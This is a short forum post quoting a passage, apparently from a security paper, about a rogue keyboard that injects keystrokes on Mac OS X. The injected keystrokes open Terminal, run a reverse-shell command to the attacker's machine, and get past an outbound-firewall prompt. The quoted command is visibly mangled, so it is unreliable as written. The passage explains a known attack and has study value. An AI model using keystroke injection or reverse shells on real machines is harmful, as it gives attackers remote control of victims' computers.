Ну ты хоть ниже почитай.
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends a shell back to port 4444 on localhost. The firewall in the Mac OS X Leopard operating system is by default not enabled, and in any case, does not block outgoing connections. In the event that the user uses an outbound firewall like Little Snitch, an extra RETURN at the end of the above sequence of keystrokes will select the default option of allowing the outbound TCP connection from Terminal.app."
No replies so far